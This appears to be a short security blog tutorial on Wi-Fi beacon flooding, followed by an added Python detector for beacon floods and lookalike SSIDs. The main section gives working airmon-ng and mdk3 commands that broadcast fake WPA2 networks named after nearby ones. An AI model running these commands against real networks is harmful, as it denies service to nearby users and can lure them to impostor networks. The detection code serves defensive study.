Beacon Flooding Attack

By Mr. Robot, published in InfoSec Adventures, Jan 9, 2018

This attack scenario is about confusing a wireless client's view of the networks it can connect to. We are going to transmit countless fake beacon frames. After some time, so many wireless networks are advertised that the user is totally confused and lost in a long list of networks.

Steps:

Create a monitoring interface with the following command:

airmon-ng start INTERFACE

You can capture beacon frames in Wireshark with the following filter:

wlan.fc.type_subtype == 0x08

To better target clients, I created a dictionary file with SSID names similar to the surrounding network names (each on a separate line):

nano ssid_names.txt

To begin transmitting the beacon frames, I’ll use the mdk3 tool in b (beacon flooding) mode with the options -a (advertise a WPA2 network), -g (advertise a 54Mbps network) and -f (use the provided dictionary file):

mdk3 MONITOR_INTERFACE b -a -g -f ssid_names.txt

If you want to mess around with specific wireless devices, you can specify the channel number:

mdk3 MONITOR_INTERFACE b -a -g -f ssid_names.txt -c CHANNEL

This is also a Denial of Service type of attack, which means it is active. Wireless intrusion detection and prevention systems are likely to be triggered.
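How a wireless IDS might recognise this traffic, as an added example that is not part of the original article: it flags a burst of never-before-seen BSSIDs and SSIDs that resemble a known network name. The input format (timestamp, BSSID, SSID, tab-separated, taken from beacons matched by the filter above), the function names, the thresholds and the sample records are all assumptions constructed for illustration.

```python
from collections import deque
from difflib import get_close_matches

# Constructed sample: epoch<TAB>BSSID<TAB>SSID, one observed beacon per line.
SAMPLE = "\n".join([
    "100.0\taa:bb:cc:00:00:01\tCorpNet",        # legitimate access point
    "100.1\taa:bb:cc:00:00:01\tCorpNet",
    "101.0\t02:11:22:33:44:01\tCorpNet1",
    "101.1\t02:11:22:33:44:02\tCorpNet-Guest",
    "101.2\t02:11:22:33:44:03\tC0rpNet",
    "101.3\t02:11:22:33:44:04\tCorpNet_5G",
    "160.0\t02:99:88:77:66:01\tCoffeeShop",     # unrelated new neighbour
])

def parse_beacons(text):
    """Yield (timestamp, bssid, ssid) tuples from tab-separated lines."""
    for line in text.splitlines():
        ts, bssid, ssid = line.split("\t", 2)
        yield float(ts), bssid.lower(), ssid

def detect(beacons, known, window=10.0, max_new=3, cutoff=0.6):
    """known maps each legitimate SSID to its set of BSSIDs.
    Returns a list of (timestamp, kind, detail) alerts."""
    seen = {b for bssids in known.values() for b in bssids}
    recent = deque()      # first-seen times of new BSSIDs inside the window
    flooding = False      # suppresses repeated flood alerts for one burst
    alerts = []
    for ts, bssid, ssid in beacons:
        if bssid in seen:
            continue      # repeat beacon from an already known transmitter
        seen.add(bssid)
        recent.append(ts)
        while ts - recent[0] > window:
            recent.popleft()
        # An unknown BSSID advertising a name close to one of ours.
        match = get_close_matches(ssid, list(known), n=1, cutoff=cutoff)
        if match:
            alerts.append((ts, "lookalike", f"{ssid!r} ~ {match[0]!r} from {bssid}"))
        # Too many new transmitters appearing within one window.
        if len(recent) > max_new and not flooding:
            alerts.append((ts, "flood", f"{len(recent)} new BSSIDs in {window}s"))
        flooding = len(recent) > max_new
    return alerts

ALERTS = detect(parse_beacons(SAMPLE), {"CorpNet": {"aa:bb:cc:00:00:01"}})
```

The window and thresholds need tuning per site: a busy office sees new BSSIDs all day, so the rate that counts as a flood differs from a quiet one.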

Mr. Robot
InfoSec Adventures

Self-taught developer with an interest in Offensive Security. I regularly play on Vulnhub and Hack The Box.